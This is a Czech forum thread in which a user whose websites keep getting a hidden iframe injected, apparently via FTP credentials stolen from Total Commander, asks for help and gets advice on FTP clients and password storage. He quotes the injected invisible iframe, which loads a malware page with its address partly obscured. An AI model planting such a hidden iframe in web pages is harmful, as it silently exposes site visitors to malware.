Autor Zpráva
joe
Profil
Ahoj,

Mám problém s tím, že ke každému mému webu se přidá do indexu iframe nebo javascript, který volá nějakou zavirovanou stránku. Nevím jak je to možné a kdo to dělá, ale asi Total Commander. Provede se to na všech webech, které mám v seznamu pro připojení Ctrl+F. Antivirový program žádný vir nenajde.

Kód, který se vložil naposledy je:
<iframe src="h..p://m..bile...t.info/61/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>


Nemá někdo podobný problém? Co s tím? To mám každý den kontrolovat weby, jestli nabíhají a kontrolovat kód?

Mj., například s takovým iframe zamezí zobrazení stránky například v IE6, který zcela zatuhne.
Měsíček
Profil
Změnit si heslo k účtům a nenahrávat své stránky přes nezabezpečený TC.
joe
Profil
Měsíček
A jaký používat FTP klient? Od té doby, co jsem potřeboval nahrát na FTP web, kde bylo poměrně dost zanořených složek jsem přestal shánět jiné programy, vzdal jsem to, protože nic jiného kromě TC to nedokázalo nahrát.
Jde nějak zabezpečit připojení v TC? :)
Měsíček
Profil
"Jde nějak zabezpečit připojení v TC? :)"

Největší problém je v tom, že TC si hesla ukládá a všichni smrtelníci ví kde, a žel i nesmrtelné programy, proto není problém nějákému *waru si udělat s hesly co se mu zlíbí, nemusí to být přímo virus (proto ti to třeba i antivir nenašel).
joe
Profil
Měsíček
To vím kam to ukládá, je to sice nějak šifrované, ale asi ne moc dobře. A co tedy používat za FTP klienta? Kterýkoli jiný?
nightfish
Profil
joe
A jaký používat FTP klient?
filezilla (ale jak je to s bezpečností uložených hesel ti nepovím)
souki
Profil
joe
Nebo si FTP zkrátka připojit přes windows jako další disk :) Nebo jako umístění v síti. Pak už můžete s klidem používat i fuj fuj TC
Měsíček
Profil
A nebo si vytvoř svoji vlastní aplikaci, třebas pomocí PHP :) otázka 4 hodin.
souki
Profil
Měsíček
jo, to bude úžasně pohodlné....
Měsíček
Profil
Osobně si to teď dělám a připadá mi to rychlejší a pohodlnější než pevný program :), ale asi to bude jen sugesce.
souki
Profil
Měsíček
Nahrát v tom 30 souborů na server zároveň musí být tedy chuťovka
joe
Profil
souki
Tak to nevím jak nastavit jako síťovou jednotku.

Měsíček
Zvyknul jsem si pužívat klávesový zkratky, takže by do toho musel být přidaný i JS, který zase na takové úrovni neovládám.

---

A když to budu dělat tak, že hesla budu zadávat po každém připojení (i když to teda bude dost zdržovat) tak snad nic takového už nehrozí, ne?
Případně poraďte nějaký program, který by umožnil nastavení klávesových zkratek pro všechny akce. Při nejmenším mi stačí aby to bylo F5 jako kopírování a F4 na editování v nastaveném programu a aby to ukládalo nějak bezpečněji hesla. Existuje něco takového?

Nechci zkoušet plno programů a pak je odinstalovávat, mám poměrně nově nainstalovaný systém :)
souki
Profil
joe
Tento počítač / Přidat síťovou jednotku (případně umístění v síti) a je tam průvodce pro deb*ly
joe
Profil
souki
Představoval jsem si pod tím něco jinýho. Přece tohle nebudu dělat pro každý hosting ne? :)

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0